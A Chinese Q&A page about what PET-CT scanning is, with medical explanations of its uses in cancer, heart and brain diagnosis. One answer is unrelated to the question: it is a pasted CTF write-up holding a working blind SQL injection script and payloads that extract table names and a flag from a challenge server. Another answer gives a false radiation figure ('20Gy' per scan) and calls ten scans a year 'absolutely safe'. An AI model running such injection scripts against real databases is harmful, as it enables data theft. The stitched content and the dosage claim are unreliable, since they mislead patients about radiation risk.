什么是petct?

发布网友 发布时间：2022-04-24 01:29

我来回答

共5个回答

懂视网 时间：2022-04-11 09:01

coding:utf-8 import requests import time url = ‘http://14b858fa-e701-47da-a11a-304ef60eb42d.node3.buuoj.cn/‘ def str_hex(s): #十六进制转换 fl ==> 0x666c res = ‘‘ for i in s: res += hex(ord(i)).replace(‘0x‘,‘‘) res = ‘0x‘ + res return res res = ‘‘ for i in range(1,200): print(i) left = 31 right = 127 mid = left + ((right - left)>>1) while left < right: #payload = ‘1^(ascii(substr(database(),{},1))>{})‘.format(i,mid) #爆库 #payload = ‘1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys),{},1))>{})‘.format(i,mid) #爆表 #payload = ‘1^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),{},1))>{})‘.format(i,mid) #猜测f1ag_1s_h3r3_hhhhh中的列名为flag key = (str_hex(res+chr(mid))) payload = "1 ^ ( (select 1,{}) > (select * from f1ag_1s_h3r3_hhhhh))".format(key) data = { ‘id‘:payload } r = requests.post(url = url, data = data) if r.status_code == 429: print(‘too fast‘) time.sleep(2) if ‘Nu1L‘ in r.text: left = mid + 1 elif ‘Nu1L‘ not in r.text: right = mid mid = left + ((right-left)>>1) if mid == 31 or mid == 127: break #res += chr(mid) #爆表 res += chr(mid-1) #爆flag print(str(mid),res) #give_grandpa_pa_pa_pa #news,users,f1ag_1s_h3r3_hhhhh,users233333333333333 #flag{8ebdb3ac-1d0e-47f3-82d5-ef5b4d20fe70}

因为or被过滤了，information_schema库用不了，使用sys.x$schema_flattened_keys来爆表名

flag的获取有两种方法

第一种：

　　　　直接猜f1ag_1s_h3r3_hhhhh中的列名为flag

第二种：

　　　　爆破

关键payload

1 ^ ( (select 1,1) > (select * from f1ag_1s_h3r3_hhhhh))

这里的1用来探测列数，通过删减1的个数来探测列的数量

 

1 ^ ( (select 1,‘f‘) > (select * from f1ag_1s_h3r3_hhhhh))

原理：

按位去比较，如果爆破字符与flag的第一个字符相等，就向后继续，大了小了都要继续当前的循环，直到找到合适的字符

当小于等于f的时候，是1^0，回显Nu1L，当大于f，即g之类的字符时，是1^1，返回Error Occured When Fetch Result.

所以最后的mid要减一才是正确的字符

这里我们传入十六进制，mysql会自动将十六进制转为字符

mysql不区分大小写，比较的时候O(0x4f)的ascii比f(0x66)的ascii小，但是比较的结果是O比f大 

 

 参考

https://www.gem-love.com/ctf/1782.html

http://www.gr0wth.top/index.php/2020/03/31/gyctf2020ezsqli/

[GYCTF2020]Ezsqli

标签：color   两种   http   用不了   过滤   脚本   select   request   sci   

热心网友 时间：2022-04-11 06:09

PET全称为正电子发射计算机断层显像(positron emission tomography PET)，是反映病变的基因、分子、代谢及功能状态的显像设备。它是利用正电子核素标记葡萄糖等人体代谢物作为显像剂，通过病灶对显像剂的摄取来反映其代谢变化，从而为临床提供疾病的生物代谢信息。是当今生命科学、医学影像技术发展的新里程碑。CT（Computed Tomography）是大家所熟悉的X线断层显像技术。可以清楚的获得病变的解剖结构信息，但是仅靠结构特点诊断疾病有局限性，有些病变的性质比如肿瘤的良恶性、手术后肿瘤有无复发CT均难以做出准确的判断。不能准确地反映疾病的生理代谢状态。PET-CT是将PET和CT整合在一台仪器上，组成一个完整的显像系统，被称作PET-CT系统（integrated PET-CT system）, 病人在检查时经过快速的全身扫描，可以同时获得CT解剖图像和PET功能代谢图像，两种图像优势互补，使医生在了解生物代谢信息的同时获得精准的解剖定位，从而对疾病做出全面、准确的判断。 PET利用正电子发射体的核素标记一些生理需要的化合物或代谢底物如葡萄糖、脂肪酸、氨基酸、受体的配体及水等，引入体内后，应用正电子扫描机而获得的体内化学影像。它以其能显示脏器或组织的代谢活性及受体的功能与分布而受到临床广泛的重视，也称之为“活体生化显像”。可以说，PET的出现使得医学影像技术达到了一个崭新的水平，使无创伤性的、动态的、定量评价活体组织或器官在生理状态下及疾病过程中细胞代谢活动的生理、生化改变，获得分子水平的信息成为可能，这是目前其他任何方法所无法实现的。因此，在发达国家，PET广泛应用于临床，已成为肿瘤、冠心病和脑部疾病这三大威胁人类生命疾病诊断和指导治疗的最有效手段。目前最常用的PET显像剂为18F标记的FDG（18F-FDG 氟化脱氧葡萄糖），是一种葡萄糖的类似物。 PET/CT在肿瘤疾病中的应用 1.肿瘤的早期诊断和良恶性鉴别: 肿瘤组织的重要特点之一就是生长迅速、代谢旺盛，特别是葡萄糖酵解速率增高。因此，代谢显像是早期诊断恶性肿瘤的最灵敏的方法之一。如发现肺部单发结节，PET显示代谢明显活跃，则提示为恶性病变。若无代谢增高表现，提示良性病变可能性大，手术的选择就要慎重。 2.确定各类恶性肿瘤的分期和分级: PET能一次进行全身断层显像，这也是其它显像设备所无法实现的。除了发现原发部位病变，还可以发现全身各部位软组织器官及骨骼有无转移病变，对肿瘤的分期非常有帮助，并提供准确的穿刺或组织活检的部位，协助临床医生制订最佳的治疗方案。 3.治疗效果评估和预后判断： 对肿瘤各种治疗的疗效进行评估并进行预后判断，指导进一步的治疗。 4.早期鉴别肿瘤复发，对肿瘤进行再分期： PET可以对治疗后肿瘤残留或复发进行早期诊断，并与治疗后纤维化、坏死进行鉴别，同时根据治疗后病灶分布情况进行再分期，CT及MRI等结构信息为主的影像手段很难做到这一点。 5.肿瘤原发病灶的寻找： 通过快速的全身PET/CT扫描，为不明原因的转移性肿瘤寻找原发病灶。 6.放疗生物靶区定位： 帮助放疗科医生勾画生物靶区。例如在肺癌合并肺不张等情况下，放疗师很难判断肿瘤的实际边界，PET将有助于确定代谢活跃的病灶范围，为放射治疗（尤其是精准放疗）提供更合理、准确的定位，降低治疗的副作用。 心肌存活的研究已成为近年来的热门话题，普遍认为，PET心肌代谢显像的方法，是目前判断心肌细胞活性最准确的方法，称为“金标准”。PET显像可以帮助确定和鉴别坏死心肌与可逆性缺血心肌，对介入治疗、冠状动脉搭桥手术有重要的指导作用，可明显提高搭桥手术的成功率，同时可对术后心功能恢复情况进行预测。 脑代谢显像能准确了解正常情况下和疾病状态下的神经细胞活动及代谢变化，以及不同生理条件刺激和思维活动状态大脑皮质的代谢情况。通过PET直观地了解到*脑代谢活动情况及各种生理性或病理性代谢变化，并以图像的方式反映出来。 具体应用： 1. 癫痫定位： 对脑癫痫病灶准确定位，为外科手术或伽玛刀切除癫痫病灶提供依据； 2. 脑肿瘤定性和复发判断： 脑肿瘤的良恶性定性、恶性胶质瘤边界的确定、肿瘤治疗后放射性坏死与复发的鉴别、肿瘤活检部位的选择等。 3. 痴呆早期诊断：早老性痴呆的早期诊断、分期并与其他类型痴呆如血管性痴呆进行鉴别。 4. 脑受体研究：帕金森病的脑受体分析，进行疾病的诊断和指导治疗。 5. 脑血管疾病：PET可以敏感地捕捉到脑缺血发作引起的脑代谢变化，因此可以对一过性脑缺血发作（TIA）和脑梗死进行早期诊断和定位，并进行疗效评估和预后判断。 6. 药物研究：进行神经精神药物的药理学评价和指导用药，观察强迫症等患者脑葡萄糖代谢的变化情况，为立体定向手术治疗提供术前的依据和术后疗效随访等。 PET/CT是一种灵敏度高、准确性好、无创伤的检查手段，对许多疾病（尤其是常见的恶性肿瘤等疾病）具有早期发现、早期诊断的价值。PET/CT检查可一次性全身成像，便于发现全身体内是否存在危险的微小病变，早期诊断可使受检者能真正得到早期治疗而争取达到治愈。同时PET/CT检查也特别适合于判断大脑或心脏是否存在早期缺血、缺氧等代谢功能方面的异常变化，有助于指导受检者及时采取针对性治疗或采取恰当地预防措施。

热心网友 时间：2022-04-11 07:27

PETCT是现代最高端的检查设备，能够一次性完成全身的检查，发现病灶以及癌细胞的一个转移情况，具体的情况，去PETCT肿瘤检查网上去了解一下吧！

热心网友 时间：2022-04-11 09:01

概念：PET-CT将CT与PET融为一体,由CT提供病灶的精确解剖定位,而PET提供病灶详尽的功能与代谢等分子信息,具有灵敏、准确、特异及定位精确等特点,一次显像可获得全身各方位的断层图像,可一目了然的了解全身整体状况,达到早期发现病灶和诊断疾病的目的。

副作用：一个人做了一次PET/CT等于做了两次CT扫描而已。这两次的CT扫描可能也就是20Gy，一年一个人做10次扫描都是绝对安全的。
优势：petct一次成像可以看到清晰看到全身病变，对于小于3cm的肿瘤可以确诊，这些ct是做不到的

热心网友 时间：2022-04-11 10:53

我了解的是该技术是影像融合技术，因为对人体有辐射，常被建议用于已患病人群或肿瘤高危人群全身检查，像我之前有一个同事去上海全景医学准备做这个检查，但是该中心的影像医生说他目前没有什么临床症状，不建议做，后来选的其他项目。